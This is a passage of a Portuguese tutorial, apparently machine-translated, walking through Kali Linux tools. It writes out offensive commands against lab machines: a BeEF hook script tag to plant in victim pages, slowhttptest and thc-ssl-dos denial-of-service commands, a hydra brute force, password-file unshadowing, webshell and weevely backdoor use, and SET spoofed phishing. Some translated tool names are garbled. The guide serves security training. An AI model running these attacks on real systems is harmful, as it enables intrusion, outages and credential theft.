explorações e expõe os recursos avançados de pós-exploração. 
Vamos abri-lo, mas primeiro o console metasploit deve ser aberto e 
iniciado. Para abrir o Armitage, vá para Aplicativos → Explorar Ferramentas → 
Armitage. 
 
Clique no botão Conectar , conforme mostrado na captura de tela a seguir. 
 
Quando abrir, você verá a seguinte tela. 
 
Armitage é fácil de usar. A área "Alvos" lista todas as máquinas que você 
descobriu e com as quais está trabalhando. Os alvos hackeados são de cor 
vermelha com uma tempestade. 
Depois de hackear o alvo, você pode clicar com o botão direito do mouse e 
continuar a explorar o que você precisa fazer, como explorar (navegar) nas 
pastas. 
 
Na GUI a seguir, você verá a exibição das pastas, chamada console. Apenas 
clicando nas pastas, você pode navegar pelas pastas sem a necessidade de 
comandos metasploit. 
No lado direito da GUI, há uma seção na qual os módulos de vulnerabilidades 
estão listados. 
 
Carne 
BeEF é a sigla de Browser Exploitation Framework . É uma ferramenta de 
teste de penetração que se concentra no navegador da web. O BeEF permite 
que o testador de penetração profissional avalie a postura de segurança real de 
um ambiente de destino usando vetores de ataque do lado do cliente. 
Primeiro, você deve atualizar o pacote Kali usando os seguintes comandos - 
root@kali:/# apt-get update 
root@kali:/# apt-get install beef-xss 
Para iniciar, use o seguinte comando - 
root@kali:/# cd /usr/share/beef-xss 
root@kali:/# ./beef 
 
Abra o navegador e digite o nome de usuário e a senha: beef . 
 
O gancho do BeEF é um arquivo JavaScript hospedado no servidor BeEF que 
precisa ser executado nos navegadores do cliente.Quando isso acontece, ele 
volta a chamar o servidor BeEF, comunicando muitas informações sobre o 
destino. Ele também permite que comandos e módulos adicionais sejam 
executados contra o destino. Neste exemplo, o local do gancho do BeEF está 
em http://192.168.1.101:3000/hook.js . 
Para atacar um navegador, inclua o gancho JavaScript em uma página que o 
cliente exibirá. Existem várias maneiras de fazer isso, mas o mais fácil é inserir 
o seguinte em uma página e de alguma forma fazer com que o cliente o abra. 
<script src = "http://192.168.1.101:3000/hook.js" type = 
"text/javascript"></script> 
Quando a página carregar, volte ao Painel de Controle do BeEF e clique em 
"Navegadores Online" no canto superior esquerdo. Após alguns segundos, 
você verá o seu endereço IP pop-up representando um navegador 
conectado. Passar o mouse sobre o IP fornecerá rapidamente informações 
como a versão do navegador, o sistema operacional e os plug-ins instalados. 
 
Para executar remotamente o comando, clique no host "Próprio". Em seguida, 
no comando, clique no módulo que você deseja executar e, finalmente, clique 
em "Executar". 
 
Sugeridor de exploração do Linux 
Ele sugere possíveis explorações, dada a versão de lançamento 'uname -r' do 
sistema operacional Linux. 
Para executá-lo, digite o seguinte comando - 
root@kali:/usr/share/linux-exploit-suggester# 
./Linux_Exploit_Suggester.pl -k 3.0.0 
3.0.0 é a versão do kernel do sistema operacional Linux que queremos explorar. 
 
Kali Linux - Ferramentas forenses 
Neste capítulo, aprenderemos sobre as ferramentas forenses disponíveis no 
Kali Linux. 
p0f 
O p0f é uma ferramenta que pode identificar o sistema operacional de um host 
de destino simplesmente examinando os pacotes capturados, mesmo quando 
o dispositivo em questão está protegido por um firewall de pacotes. P0f não 
gera nenhum tráfego de rede adicional, direto ou indireto; nenhuma pesquisa 
de nome; sem sondas misteriosas; nenhuma consulta ARIN; nada. Nas mãos 
de usuários avançados, o P0f pode detectar a presença do firewall, o uso do 
NAT e a existência de balanceadores de carga. 
Digite "p0f - h" no terminal para ver como usá-lo e você obterá os seguintes 
resultados. 
 
 
Ele listará até as interfaces disponíveis. 
 
Em seguida, digite o seguinte comando: “p0f –i eth0 –p -o nome do arquivo” . 
Onde o parâmetro "-i" é o nome da interface, como mostrado acima. "-
p" significa que está no modo promíscuo. "-o" significa que a saída será salva 
em um arquivo. 
 
Abra uma página da web com o endereço 192.168.1.2 
 
A partir dos resultados, você pode observar que o servidor da Web está usando 
o apache 2.xe o sistema operacional é o Debian. 
analisador de pdf 
O analisador de pdf é uma ferramenta que analisa um documento PDF para 
identificar os elementos fundamentais usados no arquivo pdf analisado. Não 
renderizará um documento PDF. Não é recomendado para estojo de livro de 
texto para analisadores de PDF, no entanto, ele faz o trabalho. Geralmente, isso 
é usado para arquivos pdf que você suspeita ter um script incorporado. 
O comando é - 
pdf-parser -o 10 filepath 
onde "-o" é o número de objetos. 
 
Como você pode ver na captura de tela a seguir, o arquivo pdf abre um comando 
CMD. 
 
Dumpzilla 
O aplicativo Dumpzilla é desenvolvido no Python 3.x e tem como objetivo extrair 
todas as informações forenses interessantes dos navegadores Firefox, 
Iceweasel e Seamonkey a serem analisadas. 
ddrescue 
Ele copia dados de um arquivo ou dispositivo de bloco (disco rígido, cdrom etc.) 
para outro, tentando resgatar as partes boas primeiro em caso de erros de 
leitura. 
A operação básica do ddrescue é totalmente automática. Ou seja, você não 
precisa esperar por um erro, interromper o programa, reiniciá-lo de uma nova 
posição, etc. 
Se você usar o recurso mapfile do ddrescue, os dados serão resgatados com 
muita eficiência (somente os blocos necessários serão lidos). Além disso, você 
pode interromper o resgate a qualquer momento e retomar mais tarde no 
mesmo ponto. O mapfile é uma parte essencial da eficácia do ddrescue. Use-o, 
a menos que saiba o que está fazendo. 
A linha de comando é - 
dd_rescue infilepath outfilepath 
O parâmetro "–v" significa detalhado. "/ dev / sdb" é a pasta a ser 
resgatada. O arquivo img é a imagem recuperada. 
 
DFF 
É outra ferramenta forense usada para recuperar os arquivos. Também tem 
uma interface gráfica. Para abri-lo, digite “dff-gui” no terminal e a seguinte GUI 
da web será aberta. 
 
Clique em Arquivo → "Abrir Evidência". 
 
A tabela a seguir será aberta. Marque “Formato bruto” e clique em “+” para 
selecionar a pasta que deseja recuperar. 
 
Em seguida, você pode procurar os arquivos à esquerda do painel para ver o 
que foi recuperado. 
 
Linux Linux - Engenharia Social 
Neste capítulo, aprenderemos sobre as ferramentas de engenharia social 
usadas no Kali Linux. 
Uso do Social Engineering Toolkit 
O Social-Engineer Toolkit (SET) é uma estrutura de teste de penetração de 
código aberto projetada para engenharia social. O SET possui vários vetores de 
ataque personalizados que permitem fazer um ataque crível em uma fração de 
tempo. Esse tipo de ferramenta usa comportamentos humanos para induzi-los 
aos vetores de ataque. 
Vamos aprender a usar o Social Engineer Toolkit. 
Etapa 1 - Para abrir o SET, vá para Aplicativos → Ferramentas de engenharia 
social → Clique em “SET” Ferramenta de engenharia social. 
 
Etapa 2 - Ele perguntará se você concorda com os termos de 
uso. Digite “y” como mostrado na captura de tela a seguir. 
 
Etapa 3 - A maioria dos menus mostrados na captura de tela a seguir é auto-
explicativa e, dentre eles, o mais importante é o número 1 "Ataques de 
engenharia social". 
 
Etapa 4 - Digite "1" → Enter. Um submenu será aberto. Se você pressionar 
o botão Enter novamente, verá as explicações para cada submenu. 
O módulo Spear-phishing permite criar mensagens de email especialmente e 
enviá-las às vítimas-alvo com cargas 
úteis FileFormatmalicious anexadas . Por exemplo, o envio de documento 
PDF malicioso que, se a vítima abrir, comprometerá o sistema. Se você deseja 
falsificar seu endereço de e-mail, verifique se “Sendmail” está instalado (apt-get 
install sendmail) e altere o sinalizador config / set_config SENDMAIL = OFF para 
SENDMAIL = ON. 
Existem duas opções para o ataque de spear phishing - 
 Realizar um ataque em massa por email 
 Criar uma carga útil FileFormat e um modelo de engenharia social 
O primeiro é deixar o SET fazer tudo por você (opção 1), o segundo é criar sua 
própria carga útil do FileFormat e usá-la em seu próprio ataque. 
 
Digite "99" para voltar ao menu principal e digite "2" para ir para "Os vetores 
de ataque na web". 
O módulo de ataque na web é uma maneira única de utilizar vários ataques 
baseados na web para comprometer a vítima pretendida. Este módulo é usado 
executando ataques de phishing contra a vítima, se ela clicar no link. Existe uma 
grande variedade de ataques que podem ocorrer quando eles clicam em um 
link. 
 
Digite "99" para retornar ao menu principal e digite "3" . 
O infeccioso módulo USB / CD / DVD criará um arquivo autorun.inf e uma carga 
útil do Metasploit. A carga útil e o arquivo de execução automática são gravados 
ou copiados em um USB. Quando um DVD / USB / CD é inserido na máquina 
da vítima, ele aciona um recurso de execução automática (se a execução 
automática estiver ativada) e, comprometidamente, compromete o 
sistema. Você pode escolher o vetor de ataque que deseja usar: erros de 
formato de arquivo ou um executável direto. 
A seguir, estão as opções para o Infectious Media Generator. 
 Explorações no formato de arquivo 
 Executável Metasploit Padrão 
 
Digite "99" para voltar ao menu principal. Em seguida, digite "4" para ir para 
"Os vetores de ataque da web". 
A carga útil de criação e o ouvinte é uma maneira simples de criar uma carga 
útil do Metasploit. Ele exportaráo arquivo exe para você e gerará um 
ouvinte. Você precisaria convencer a vítima a baixar o arquivo exe e executá-lo 
para obter o shell. 
 
Digite "99" para voltar ao menu principal e digite "5" para ir para "Os vetores 
de ataque na web". 
 
O ataque de mala direta permitirá que você envie vários emails para as vítimas 
e personalize as mensagens. Existem duas opções no email em massa; o 
primeiro é enviar um email para um único endereço de email. A segunda opção 
permite importar uma lista com todos os emails de destinatários e enviará sua 
mensagem para quantas pessoas você desejar nessa lista. 
 Endereço de email único do ataque por email 
 E-Mail Attack Mass Mailer 
Digite "99" para voltar ao menu principal e digite "9" para ir para "Vetor de 
ataque do PowerShell". 
 
O módulo Vetor de ataque do Powershell permite criar ataques específicos do 
PowerShell. Esses ataques permitem usar o PowerShell, que está disponível 
por padrão em todos os sistemas operacionais Windows Vista e superior. O 
PowerShell fornece um cenário frutífero para implantar cargas úteis e executar 
funções que não são acionadas por tecnologias preventivas. 
 Injetor Alfanumérico Shellcode da Powershell 
 Powershell Reverse Shell 
 Casco de Ligação do Powershell 
 Banco de Dados SAM do Dump do PowerShell 
Kali Linux - Ferramentas de estresse 
As ferramentas de estresse são usadas para criar ataques de negação de 
serviço ou para criar o teste de estresse para diferentes aplicativos, a fim de 
tomar medidas apropriadas para o futuro. 
Todas as ferramentas de teste de estresse são encontradas em Aplicativos → 
02-Vulnerability Analysis → Stress testing. 
 
Todo teste de teste de estresse será realizado em uma máquina que pode ser 
explorada com IP 192.168.1.102 
 
Slowhttptest 
Slowhttptest é uma das ferramentas de ataque do DoS. Ele usa especialmente 
o protocolo HTTP para conectar-se ao servidor e manter os recursos ocupados, 
como CPU e RAM. Vamos ver em detalhes como usá-lo e explicar suas 
funções. 
Para abrir o slowhttptest, primeiro abra o terminal e digite “slowhttptest –
parameters” . 
Você pode digitar “slowhttptest –h” para ver todos os parâmetros que você 
precisa usar. Caso receba uma saída, 'Comando não encontrado', você deve 
primeiro digitar “apt-get install slowhttptest” . 
 
 
Depois da instalação, digite novamente slowhttptest –h 
 
Digite o seguinte comando - 
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –
u 
http://192.168.1.202/index.php -x 24 -p 2 
Onde, 
 (-c 500) = 500 conexões 
 (-H) = modo Slowloris 
 -g = Gerar estatísticas 
 -o outputfile = Nome do arquivo de saída 
 -i 10 = Use 10 segundos para aguardar dados 
 -r 200 = 200 conexões com solicitações -t GET = GET 
 -u http://192.168.1.202/index.php = URL de destino 
 -x 24 = comprimento máximo de 24 bytes 
 -p 2 = tempo limite de 2 segundos 
 
Após o início do teste, a saída será mostrada na captura de tela a seguir, onde 
você poderá observar que o serviço está disponível. 
 
Depois de um tempo, na conexão 287, o serviço falha. Isso significa que o 
servidor pode lidar com no máximo 287 conexões HTTP. 
 
Inviteflood 
Inviteflood é uma mensagem SIP / SDP INVITE inundando UDP / IP. Ele é 
executado em uma variedade de distribuições Linux. Ele realiza ataques DoS 
(Negação de Serviço) contra dispositivos SIP enviando várias solicitações 
INVITE. 
Para abrir o Inviteflood, primeiro abra o terminal e digite "inviteflood –
parameters" 
Para obter ajuda, você pode usar "convidar inundação-h" 
 
Em seguida, você pode usar o seguinte comando - 
inviteflood eth0 target_extension target_domain target_ip 
number_of_packets 
Onde, 
 target_extension é 2000 
 target_domain é 192.168.xx 
 target_ip é 192.168.xx 
 number_of_packets é 1 
 -a é o alias da conta SIP 
 
Ixxflood 
O Iaxflood é uma ferramenta de VoIP DoS. Para abri-lo, digite "iaxflood 
sourcename destinationname numpackets" no terminal. 
Para saber como usar, digite "iaxflood –h" 
 
thc-ssl-dos 
THC-SSL-DOS é uma ferramenta para verificar o desempenho do 
SSL. Estabelecer uma conexão SSL segura requer 15x mais poder de 
processamento no servidor do que no cliente. O THCSSL-DOS explora essa 
propriedade assimétrica, sobrecarregando o servidor e eliminando-o da 
Internet. 
A seguir está o comando - 
thc-ssl-dos victimIP httpsport –accept 
Neste exemplo, será - 
thc-ssl-dos 192.168.1.1 443 –accept 
Sua saída seria a seguinte - 
 
 
Kali Linux - Sniffing & Spoofing 
O conceito básico das ferramentas de detecção é tão simples quanto as escutas 
telefônicas e o Kali Linux possui algumas ferramentas populares para esse 
fim. Neste capítulo, aprenderemos sobre as ferramentas de sniffing e spoofing 
disponíveis no Kali. 
Burpsuite 
O Burpsuite pode ser usado como uma ferramenta de detecção entre o 
navegador e os servidores da web para encontrar os parâmetros que o 
aplicativo da web usa. 
Para abrir o Burpsuite, vá para Aplicativos → Análise de Aplicativos da Web → 
burpsuite. 
 
Para fazer a configuração do sniffing, configuramos o burpsuite para se 
comportar como um proxy. Para fazer isso, vá para Opções, como mostrado na 
captura de tela a seguir. Marque a caixa como mostrado. 
Nesse caso, o IP do proxy será 127.0.0.1 com porta 8080. 
 
Em seguida, configure o proxy do navegador, que é o IP da máquina burpsuite 
e a porta. 
 
Para iniciar a interceptação, vá para Proxy → Interceptar → clique em "A 
interceptação está ativada". 
Continue navegando na página da Web em que deseja encontrar o parâmetro 
para testar vulnerabilidades. 
 
Nesse caso, é uma máquina metaploplo com IP 192.168.1.102 
 
Vá para "Histórico HTTP". Na captura de tela a seguir, a linha marcada na seta 
vermelha mostra a última solicitação. Em Raw e o parâmetro oculto, como o ID 
da sessão e outros parâmetros, como nome de usuário e senha, foram 
sublinhados em vermelho. 
 
mitmproxi 
mitmproxy é um proxy HTTP intermediário compatível com SSL. Ele fornece 
uma interface de console que permite que os fluxos de tráfego sejam 
inspecionados e editados em tempo real. 
Para abri-lo, vá ao terminal e digite "mitmproxy -parameter" e, para obter 
ajuda sobre os comandos, digite "mitmproxy -h" . 
 
Para iniciar o mitmproxy, digite "mitmproxy –p portnumber" . Nesse caso, é 
"mitmproxy –p 80". 
 
Wireshark 
O Wireshark é um dos melhores analisadores de pacotes de dados. Ele analisa 
profundamente os pacotes no nível do quadro. Você pode obter mais 
informações sobre o Wireshark na página 
oficial: https://www.wireshark.org/ . Em Kali, é encontrado usando o seguinte 
caminho - Aplicativos → Sniffing & Spoofing → wireshark. 
https://www.wireshark.org/
 
Depois de clicar em wireshark, a seguinte GUI é aberta. 
 
Clique em “Iniciar” e a captura de pacotes começará como mostrado na captura 
de tela a seguir. 
 
sslstrip 
sslstrip é um ataque MITM que força o navegador da vítima a se comunicar em 
texto sem formatação por HTTP, e os proxies modificam o conteúdo de um 
servidor HTTPS. Para fazer isso, sslstrip está "removendo" os URLs https: // e 
os transformando em URLs http: //. 
Para abri-lo, vá para Aplicativos → 09-Sniffing & Spoofing → Spoofing e MITM 
→ sslstrip. 
 
 
Para configurá-lo, escreva para encaminhar toda a comunicação de 80 portas 
para 8080. 
 
Em seguida, inicie o comando sslstrip para a porta necessária. 
 
Kali Linux - Ferramentas de quebra de senha 
Neste capítulo, aprenderemos sobre as importantes ferramentas de quebra de 
senha usadas no Kali Linux. 
Hidra 
O Hydra é um cracker de login que suporta muitos protocolos de ataque (Cisco 
AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP (S) -FORM-GET, HTTP (S) -
FORM-POST, HTTP (S) -GET, HTTP (S) -HEAD, HTTP-Proxy, ICQ, IMAP, IRC, 
LDAP, MS-SQL, MySQL, NNTP, Ouvinte Oracle, Oracle SID, PC-Anywhere, 
PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin , Rsh, SIP, SMB (NT), SMTP, 
SMTP Enum, SNMP v1 + v2 + v3,SOCKS5, SSH (v1 e v2), SSHKEY, 
Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC e XMPP) . 
Para abri-lo, vá para Aplicativos → Ataques com senha → Ataques on-line → 
hydra. 
 
Ele abrirá o console do terminal, conforme mostrado na captura de tela a seguir. 
 
Nesse caso, forneceremos serviço FTP de força bruta de máquina 
metaploploitável, que possui IP 192.168.1.101 
 
Criamos no Kali uma lista de palavras com a extensão 'lst' no caminho usr \ 
share \ wordlist \ metasploit . 
 
O comando será o seguinte - 
hydra -l /usr/share/wordlists/metasploit/user -P 
/usr/share/wordlists/metasploit/ passwords 
ftp://192.168.1.101 –V 
onde –V é o nome de usuário e a senha ao tentar 
 
Conforme mostrado na captura de tela a seguir, são encontrados o nome de 
usuário e a senha que são msfadmin: msfadmin 
 
Johnny 
Johnny é uma GUI da ferramenta de quebra de senha de John the 
Ripper. Geralmente, é usado para senhas fracas. 
Para abri-lo, vá para Aplicativos → Ataques por senha → johnny. 
 
Nesse caso, obteremos a senha da máquina Kali com o seguinte comando e 
um arquivo será criado na área de trabalho. 
 
Clique em “Abrir arquivo passwd” → OK e todos os arquivos serão mostrados 
como na captura de tela a seguir. 
 
Clique em "Iniciar ataque". 
 
Após a conclusão do ataque, clique no painel esquerdo em "Senhas" e a senha 
não será sombreada. 
 
John 
john é uma versão de linha de comando do Johnny GUI. Para iniciá-lo, abra o 
Terminal e digite "john" . 
 
No caso de não mostrar a senha, precisamos escrever o seguinte comando - 
root@kali:~# unshadow passwd shadow > unshadowed.txt 
Rainbowcrack 
O software RainbowCrack racha os hashes pela pesquisa da tabela do arco-
íris. As tabelas Rainbow são arquivos comuns armazenados no disco 
rígido. Geralmente, as tabelas Rainbow são compradas on-line ou podem ser 
compiladas com diferentes ferramentas. 
Para abri-lo, vá para Aplicativos → Ataques por senha → clique em 
“rainbowcrack”. 
 
O comando para quebrar uma senha de hash é - 
rcrack path_to_rainbow_tables -f path_to_password_hash 
SQLdict 
É uma ferramenta de ataque de dicionário para SQL Server e é muito fácil e 
básica de ser usada. Para abri-lo, abra o terminal e digite "sqldict" . Ele abrirá 
a seguinte visualização. 
 
Em "Servidor IP de destino", digite o IP do servidor que contém o SQL. Em 
"Conta de destino", digite o nome de usuário. Em seguida, carregue o arquivo 
com a senha e clique em "Iniciar" até que ele termine. 
identificador de hash 
É uma ferramenta usada para identificar tipos de hashes, ou seja, para que 
estão sendo usados. Por exemplo, se eu tiver um HASH, ele poderá me dizer 
se é um HASH para Linux ou Windows. 
 
A tela acima mostra que pode ser um hash MD5 e parece uma credencial em 
cache do domínio. 
Kali Linux - Mantendo o acesso 
Neste capítulo, veremos as ferramentas que o Kali usa para manter a conexão 
e o acesso a uma máquina invadida, mesmo quando ele se conectar e 
desconectar novamente. 
Powersploit 
Esta é uma ferramenta que é para máquinas Windows. Possui o PowerShell 
instalado na máquina das vítimas. Essa ferramenta ajuda o hacker a se 
conectar à máquina da vítima via PowerShell. 
Para abri-lo, abra o terminal à esquerda e digite o seguinte comando para entrar 
na pasta powersploit - 
cd /usr/share/powersploit/ 
Se você digitar “ls” , listará todas as ferramentas do PowerSpot que você pode 
baixar e instalar na máquina da vítima depois de obter acesso. A maioria deles 
é auto-explicada de acordo com seus nomes. 
 
Uma maneira fácil de fazer o download dessa ferramenta na máquina da vítima 
é criar um servidor da Web, que as ferramentas powersploit permitem criar 
facilmente usando o seguinte comando - 
python -m SimpleHTTPServer 
 
Depois disso, se você digitar: http: // <endereço_ip da máquina Kali>: 8000 / a 
seguir é o resultado. 
 
Sbd 
sbd é uma ferramenta semelhante ao Netcat. É portátil e pode ser usado em 
máquinas Linux e Microsoft. O sbd possui criptografia AES-CBC-128 + HMAC-
SHA1> Basicamente, ajuda a conectar-se à máquina da vítima a qualquer 
momento em uma porta específica e enviar comandos remotamente. 
Para abri-lo, vá para o terminal e digite “sbd -l -p port” para o servidor aceitar 
conexões. 
 
Nesse caso, vamos colocar a porta 44 onde o servidor escutará. 
 
No site da vítima, digite "sbd IPofserver port" . Uma conexão será 
estabelecida onde podemos enviar os comandos remotos. 
Nesse caso, é "localhost", pois realizamos o teste na mesma máquina. 
 
Finalmente, no servidor, você verá que ocorreu uma conexão, como mostrado 
na captura de tela a seguir. 
 
Webshells 
Os webshells podem ser usados para manter o acesso ou invadir um site. Mas 
a maioria deles é detectada por antivírus. O shell php C99 é muito conhecido 
entre os antivírus. Qualquer antivírus comum irá detectá-lo facilmente como um 
malware. 
Geralmente, sua principal função é enviar o comando do sistema via interfaces 
da web. 
Para abri-lo e digite “cd / usr / share / webshells /” no terminal. 
 
Como você vê, eles são divididos em classes de acordo com a linguagem de 
programação: asp, aspx, cfm, jsp, perl, php 
Se você entrar na pasta PHP, poderá ver todas as conchas da Web para 
páginas da Web em PHP. 
 
Para fazer upload do shell para um servidor web, por exemplo, “simple-
backdoor.php”, abra a página da Web e o URL do shell da web. 
No final, escreva o comando cmd. Você terá todas as informações mostradas 
como na captura de tela a seguir. 
 
Weevely 
Weevely é um shell web PHP que simula uma conexão telnet. É uma ferramenta 
para pós-exploração de aplicativos da Web e pode ser usada como um 
backdoor furtivo ou como um shell da Web para gerenciar contas da Web 
legítimas, mesmo hospedadas gratuitamente. 
Para abri-lo, vá para o terminal e digite "weevely", onde você pode ver seu uso. 
 
Para gerar o shell, digite "weevely generate password pathoffile" . Como 
visto na captura de tela a seguir, ele é gerado na pasta “Desktop” e o arquivo 
deve ser carregado em um servidor da web para obter acesso. 
 
Após fazer o upload do shell da web, conforme mostrado na captura de tela a 
seguir, podemos conectar-se ao cmd no servidor usando o comando “weevely 
URL password”, onde é possível ver que uma sessão foi iniciada. 
 
túnel http 
O http-tunnel cria um fluxo de dados virtual bidirecional encapsulado em 
solicitações HTTP. As solicitações podem ser enviadas via proxy HTTP, se 
desejado. Isso pode ser útil para usuários atrás de firewalls restritivos. Se o 
acesso à WWW for permitido por meio de um proxy HTTP, é possível usar o 
túnel http e o telnet ou o PPP para conectar-se a um computador fora do firewall. 
Primeiro, devemos criar um servidor de encapsulamento com o seguinte 
comando - 
httptunnel_server –h 
Em seguida, no site do cliente, digite “httptunnel_client –h” e ambos 
começarão a aceitar conexões. 
dns2tcp 
Esta é novamente uma ferramenta de encapsulamento que ajuda a passar o 
tráfego TCP pelo tráfego DNS, o que significa porta UDP 53. 
Para iniciá-lo, digite "dns2tcpd" . O uso é explicado quando você abrirá o 
script. 
 
No site do servidor, insira este comando para configurar o arquivo. 
#cat >>.dns2tcpdrc 
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc 
No site do cliente, insira este comando. 
# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END 
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076 
O encapsulamento começará com este comando. 
cryptcat 
É outra ferramenta como o Netcat, que permite fazer a conexão TCP e UDP 
com a máquina da vítima de maneira criptografada. 
Para iniciar um servidor para escutar uma conexão, digite o seguinte comando 
- 
cryptcat –l –p port –nOnde, 
 -l significa ouvir uma conexão 
 -p significa parâmetro do número da porta 
 -n significa não fazer a resolução de nomes 
No site do cliente, o comando de conexão é "cryptcat IPofServer 
PortofServer" 
 
Kali Linux - Engenharia Reversa 
Neste capítulo, aprenderemos sobre as ferramentas de engenharia reversa do 
Kali Linux. 
OllyDbg 
O OllyDbg é um depurador de nível de montador de 32 bits para aplicativos do 
Microsoft Windows. A ênfase na análise de código binário o torna 
particularmente útil nos casos em que a fonte está indisponível. Geralmente, é 
usado para quebrar os softwares comerciais. 
Para abri-lo, vá para Aplicativos → Engenharia Reversa → ollydbg 
 
Para carregar um arquivo EXE, vá na “Pasta de abertura” na cor amarela, 
mostrada em um quadrado vermelho na captura de tela acima. 
Após o carregamento, você terá a seguinte exibição, onde poderá alterar os 
binários. 
 
dex2jar 
Este é um aplicativo que ajuda a converter arquivos APK (android) em arquivos 
JAR para visualizar o código fonte. Para usá-lo, abra o terminal e escreva “d2j-
dex2jar –d / local do arquivo” . 
Nesse caso, o arquivo é "classes.dex" na área de trabalho. 
 
A linha a seguir mostra que um arquivo JAR foi criado. 
 
 
jd-gui 
JD-GUI é um utilitário gráfico independente que exibe os códigos-fonte Java 
dos arquivos “.class” . Você pode procurar o código fonte reconstruído. Nesse 
caso, podemos reconstruir o arquivo que extraímos da ferramenta dex2jar. 
Para iniciá-lo, abra o terminal e escreva “jd-gui” e a seguinte tela será aberta. 
Para importar o arquivo, clique no ícone de pasta aberta no canto superior 
esquerdo e importe o arquivo. 
 
apktool 
O Apktool é uma das melhores ferramentas para reverter todo o aplicativo 
Android. Ele pode decodificar recursos para quase um formato original e 
reconstruí-los após fazer modificações. 
Para abri-lo, vá ao terminal e escreva "apktool" . 
Para descompilar um arquivo apk, escreva "apktool d arquivo apk" . 
 
A descompilação começará como mostrado na captura de tela a seguir. 
 
Kali Linux - Ferramentas de Relatório 
Neste capítulo, aprenderemos sobre algumas ferramentas de relatório no Kali 
Linux. 
drade 
Em todo esse trabalho que realizamos, é importante compartilhar os resultados 
que foram produzidos, acompanhar nosso trabalho etc. Para esse propósito, o 
Kali possui uma ferramenta de relatório chamada dradis, que é um serviço da 
web. 
Etapa 1 - Para iniciar o Dradis, digite "service dradis start" . 
 
Etapa 2 - Para abrir, vá para Aplicativos → Ferramentas de relatório → dradis. 
 
O URL da web será aberto. Qualquer pessoa na LAN pode abri-lo no seguinte 
URL https: // IP da máquina kali: 3004 
Efetue login com o nome de usuário e a senha usados pela primeira vez. 
 
Etapa 3 - Após o login, você pode importar arquivos do NMAP, NESSUS, 
NEXPOSE. Para fazer isso, vá para “Importar do arquivo” → clique em “novo 
importador (com feedback em tempo real)”. 
 
Etapa 4 - Selecione o tipo de arquivo que você deseja enviar. Nesse caso, é 
“Nessus scan” → clique em “Browse”. 
 
Se você for para a página inicial agora, no painel esquerdo, verá que as 
verificações importadas estão em uma pasta com os detalhes do host e da 
porta. 
 
Metagoofil 
O Metagoofil realiza uma pesquisa no Google para identificar e baixar os 
documentos no disco local e extrai os metadados. Extrai metadados de 
documentos públicos pertencentes a uma empresa, indivíduo, objeto, etc. 
específicos 
Para abri-lo, vá para: "usr / share / metagoofil /" . 
 
Para iniciar a pesquisa, digite o seguinte comando - 
python metagoofil.py 
Você pode usar os seguintes parâmetros com este comando - 
 –D (nome de domínio) 
 –T (tipo de arquivo para fazer download de dox, pdf etc.) 
 –L (limite os resultados 10, 100) 
 –N (limite de arquivos para download) 
 –O (local para salvar os arquivos) 
 –F (arquivo de saída) 
O exemplo a seguir mostra apenas o nome do domínio está oculto.

Mais conteúdos dessa disciplina